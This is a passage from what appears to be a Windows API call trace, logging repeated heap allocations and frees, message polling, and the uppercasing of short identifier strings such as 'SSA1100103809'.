Size=0x20) returned 0x2a78278 [0149.541] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9fb8 [0149.541] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78138 [0149.541] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9fd0 [0149.541] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71c48 [0149.541] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9fd0 | out: hHeap=0x2af0000) returned 1 [0149.541] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a781b0 [0149.541] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9fd0 [0149.541] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78110 [0149.542] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9fe8 [0149.542] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71c78 [0149.542] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9fe8 | out: hHeap=0x2af0000) returned 1 [0149.542] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a783b8 [0149.542] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa0d8 [0149.542] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de88 [0149.542] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0149.542] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d38 [0149.542] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c38 [0149.542] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa090 [0149.542] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa150 [0149.542] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71bb8 [0149.542] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa168 [0149.542] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bb8 | out: hHeap=0x2af0000) returned 1 [0149.542] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71bf8 [0149.542] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77ff8 [0149.542] CharUpperBuffW (in: lpsz="SSA2600502813", cchLength=0xd | out: lpsz="SSA2600502813") returned 0xd [0149.542] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77ff8 | out: hHeap=0x2af0000) returned 1 [0149.542] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bf8 | out: hHeap=0x2af0000) returned 1 [0149.542] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa168 | out: hHeap=0x2af0000) returned 1 [0149.542] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa150 | out: hHeap=0x2af0000) returned 1 [0149.542] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa090 | out: hHeap=0x2af0000) returned 1 [0149.542] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c38 | out: hHeap=0x2af0000) returned 1 [0149.542] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d38 | out: hHeap=0x2af0000) returned 1 [0149.542] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5eb80 [0149.542] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0149.542] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5eb80 | out: hHeap=0x2af0000) returned 1 [0149.542] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0149.542] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9fe8 [0149.542] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71c58 [0149.543] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9fe8 | out: hHeap=0x2af0000) returned 1 [0149.543] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77ff8 [0149.543] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa150 [0149.543] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9fe8 [0149.543] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71bc8 [0149.543] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78070 [0149.543] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa090 [0149.543] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71c88 [0149.543] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa090 | out: hHeap=0x2af0000) returned 1 [0149.543] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a782c8 [0149.543] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa090 [0149.543] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa168 [0149.543] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77ff8 | out: hHeap=0x2af0000) returned 1 [0149.543] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c58 | out: hHeap=0x2af0000) returned 1 [0149.543] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa150 | out: hHeap=0x2af0000) returned 1 [0149.543] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0149.543] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa150 [0149.543] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71cc8 [0149.543] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa150 | out: hHeap=0x2af0000) returned 1 [0149.543] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78098 [0149.543] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa0a8 [0149.543] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa1b0 [0149.543] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71c98 [0149.543] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78250 [0149.543] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa0c0 [0149.543] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d28 [0149.543] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa0c0 | out: hHeap=0x2af0000) returned 1 [0149.543] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78368 [0149.543] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa180 [0149.543] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa0c0 [0149.544] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78098 | out: hHeap=0x2af0000) returned 1 [0149.544] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cc8 | out: hHeap=0x2af0000) returned 1 [0149.544] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa0a8 | out: hHeap=0x2af0000) returned 1 [0149.544] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0149.544] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa198 [0149.544] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d08 [0149.544] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa198 | out: hHeap=0x2af0000) returned 1 [0149.544] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78340 [0149.544] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa0a8 [0149.544] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa1f8 [0149.544] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71c58 [0149.544] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a781d8 [0149.544] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9f58 [0149.544] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71c18 [0149.544] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9f58 | out: hHeap=0x2af0000) returned 1 [0149.544] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78200 [0149.544] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa150 [0149.544] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa198 [0149.544] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78340 | out: hHeap=0x2af0000) returned 1 [0149.544] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d08 | out: hHeap=0x2af0000) returned 1 [0149.544] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa0a8 | out: hHeap=0x2af0000) returned 1 [0149.544] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0149.544] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa210 [0149.544] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ca8 [0149.544] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa210 | out: hHeap=0x2af0000) returned 1 [0149.544] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78458 [0149.544] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa210 [0149.544] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa228 [0149.544] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71cb8 [0149.544] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78160 [0149.545] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa0a8 [0149.545] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71cc8 [0149.545] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa0a8 | out: hHeap=0x2af0000) returned 1 [0149.545] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78340 [0149.545] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa0a8 [0149.545] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa1c8 [0149.545] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78458 | out: hHeap=0x2af0000) returned 1 [0149.545] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ca8 | out: hHeap=0x2af0000) returned 1 [0149.545] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa210 | out: hHeap=0x2af0000) returned 1 [0149.545] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0149.545] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa210 [0149.545] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ca8 [0149.545] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa210 | out: hHeap=0x2af0000) returned 1 [0149.545] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a782f0 [0149.545] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa210 [0149.545] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9f40 [0149.545] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d68 [0149.545] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78430 [0149.545] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9f58 [0149.545] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d98 [0149.545] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9f58 | out: hHeap=0x2af0000) returned 1 [0149.546] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78390 [0149.546] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9f58 [0149.546] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa2a0 [0149.546] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a782f0 | out: hHeap=0x2af0000) returned 1 [0149.546] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ca8 | out: hHeap=0x2af0000) returned 1 [0149.546] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa210 | out: hHeap=0x2af0000) returned 1 [0149.546] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0149.546] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a782f0 [0149.546] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ba8 [0149.546] CharUpperBuffW (in: lpsz="A1100103809", cchLength=0xb | out: lpsz="A1100103809") returned 0xb [0149.546] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a782f0 | out: hHeap=0x2af0000) returned 1 [0149.546] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ba8 | out: hHeap=0x2af0000) returned 1 [0149.546] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa210 [0149.546] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5dfa8 [0149.546] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0149.546] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d58 [0149.546] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ba8 [0149.546] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa498 [0149.546] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa2e8 [0149.546] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ca8 [0149.546] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa390 [0149.546] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ca8 | out: hHeap=0x2af0000) returned 1 [0149.546] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ca8 [0149.546] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78188 [0149.546] CharUpperBuffW (in: lpsz="SSA1100103809", cchLength=0xd | out: lpsz="SSA1100103809") returned 0xd [0149.546] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78188 | out: hHeap=0x2af0000) returned 1 [0149.546] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ca8 | out: hHeap=0x2af0000) returned 1 [0149.546] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa390 | out: hHeap=0x2af0000) returned 1 [0149.546] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa2e8 | out: hHeap=0x2af0000) returned 1 [0149.546] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa498 | out: hHeap=0x2af0000) returned 1 [0149.547] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ba8 | out: hHeap=0x2af0000) returned 1 [0149.547] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d58 | out: hHeap=0x2af0000) returned 1 [0149.547] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ebc0 [0149.547] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0149.547] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ebc0 | out: hHeap=0x2af0000) returned 1 [0149.547] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0149.547] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ce8 [0149.547] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77ff8 [0149.547] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d08 [0149.547] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0149.547] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77ff8 | out: hHeap=0x2af0000) returned 1 [0149.547] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d08 | out: hHeap=0x2af0000) returned 1 [0149.547] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa318 [0149.547] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a74820 [0149.547] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0149.547] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ba8 [0149.547] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c28 [0149.547] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa510 [0149.547] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa408 [0149.547] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d08 [0149.547] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa378 [0149.547] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d08 | out: hHeap=0x2af0000) returned 1 [0149.547] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d18 [0149.547] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77fa8 [0149.547] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0149.547] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77fa8 | out: hHeap=0x2af0000) returned 1 [0149.547] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d18 | out: hHeap=0x2af0000) returned 1 [0149.547] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa378 | out: hHeap=0x2af0000) returned 1 [0149.547] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa408 | out: hHeap=0x2af0000) returned 1 [0149.548] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa510 | out: hHeap=0x2af0000) returned 1 [0149.548] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c28 | out: hHeap=0x2af0000) returned 1 [0149.548] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ba8 | out: hHeap=0x2af0000) returned 1 [0149.548] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5eb80 [0149.548] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0149.548] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5eb80 | out: hHeap=0x2af0000) returned 1 [0149.548] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0149.548] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c28 [0149.548] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ca8 [0149.548] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa4c8 [0149.548] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa258 [0149.548] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ba8 [0149.548] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa528 [0149.548] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ba8 | out: hHeap=0x2af0000) returned 1 [0149.548] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa528 | out: hHeap=0x2af0000) returned 1 [0149.548] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa258 | out: hHeap=0x2af0000) returned 1 [0149.548] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa4c8 | out: hHeap=0x2af0000) returned 1 [0149.548] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ca8 | out: hHeap=0x2af0000) returned 1 [0149.548] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c28 | out: hHeap=0x2af0000) returned 1 [0149.548] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a74820 | out: hHeap=0x2af0000) returned 1 [0149.548] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa318 | out: hHeap=0x2af0000) returned 1 [0149.548] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d08 [0149.548] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7080 [0149.548] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa4e0 [0149.548] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa3f0 [0149.548] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d38 [0149.548] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa3d8 [0149.548] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d38 | out: hHeap=0x2af0000) returned 1 [0149.548] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa3d8 | out: hHeap=0x2af0000) returned 1 [0149.549] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa3f0 | out: hHeap=0x2af0000) returned 1 [0149.549] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa4e0 | out: hHeap=0x2af0000) returned 1 [0149.549] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7080 | out: hHeap=0x2af0000) returned 1 [0149.549] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d08 | out: hHeap=0x2af0000) returned 1 [0149.549] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ce8 | out: hHeap=0x2af0000) returned 1 [0149.549] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5eb80 [0149.549] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0149.549] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5eb80 | out: hHeap=0x2af0000) returned 1 [0149.549] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0149.549] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78098 [0149.549] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d78 [0149.549] CharUpperBuffW (in: lpsz="A5C00800A45", cchLength=0xb | out: lpsz="A5C00800A45") returned 0xb [0149.549] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78098 | out: hHeap=0x2af0000) returned 1 [0149.549] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d78 | out: hHeap=0x2af0000) returned 1 [0149.549] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa408 [0149.549] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a74868 [0149.549] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0149.549] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71cf8 [0149.549] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d08 [0149.549] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa3f0 [0149.549] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa3a8 [0149.549] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d38 [0149.549] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa2e8 [0149.549] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d38 | out: hHeap=0x2af0000) returned 